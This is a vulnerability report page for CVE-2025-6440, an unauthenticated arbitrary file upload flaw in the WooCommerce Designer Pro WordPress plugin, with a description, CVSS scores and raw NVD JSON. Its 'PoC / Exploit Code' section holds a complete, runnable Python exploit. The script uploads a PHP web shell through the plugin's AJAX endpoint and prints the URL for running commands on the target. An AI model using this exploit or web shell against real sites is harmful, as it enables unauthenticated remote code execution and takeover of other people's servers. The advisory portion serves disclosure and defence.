Security Vulnerability Report
CVE-2025-6440 CVSS 9.8 CRITICAL

CVE-2025-6440

Published: 2025-10-24 08:15:35
Last Modified: 2026-04-15 00:35:42

Description

The WooCommerce Designer Pro plugin for WordPress, used by the Pricom - Printing Company & Design Services WordPress theme, is vulnerable to arbitrary file uploads due to missing file type validation in the 'wcdp_save_canvas_design_ajax' function in all versions up to, and including, 1.9.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WooCommerce Designer Pro plugin <= 1.9.26
Pricom - Printing Company & Design Services WordPress theme (uses this plugin)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-6440 PoC - Arbitrary File Upload in WooCommerce Designer Pro
# Target: WordPress site with WooCommerce Designer Pro plugin <= 1.9.26


def exploit(target_url, file_content=None):
    """
    Exploit arbitrary file upload vulnerability
    """
    if file_content is None:
        # Default webshell content
        file_content = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>'

    target = target_url.rstrip('/')
    upload_url = f"{target}/wp-admin/admin-ajax.php"

    # Construct malicious file upload request
    files = {
        'action': (None, 'wcdp_save_canvas_design_ajax'),
        'wcdp_canvas_data': (None, 'test'),
        'wcdp_upload_file': ('shell.php', file_content, 'application/x-php')
    }

    data = {
        'action': 'wcdp_save_canvas_design_ajax',
        'wcdp_canvas_id': '1'
    }

    print(f"[*] Targeting: {target}")
    print("[*] Uploading malicious file...")

    try:
        response = requests.post(upload_url, data=data, files=files, timeout=10)
        if response.status_code == 200:
            print("[+] File upload request sent successfully")
            print(f"[*] Check for uploaded shell at: {target}/wp-content/uploads/wcdp/shell.php")
            print(f"[*] Execute command: {target}/wp-content/uploads/wcdp/shell.php?cmd=whoami")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://example.com")
        sys.exit(1)
    exploit(sys.argv[1])

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-6440",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-24T08:15:34.750",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WooCommerce Designer Pro plugin for WordPress, used by the Pricom - Printing Company & Design Services WordPress theme, is vulnerable to arbitrary file uploads due to missing file type validation in the 'wcdp_save_canvas_design_ajax' function in all versions up to, and including, 1.9.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://codecanyon.net/item/woocommerce-designer-pro-cmyk-card-flyer/22027731",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc2f8da1-7503-45e3-8a7d-0031ce264edf?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}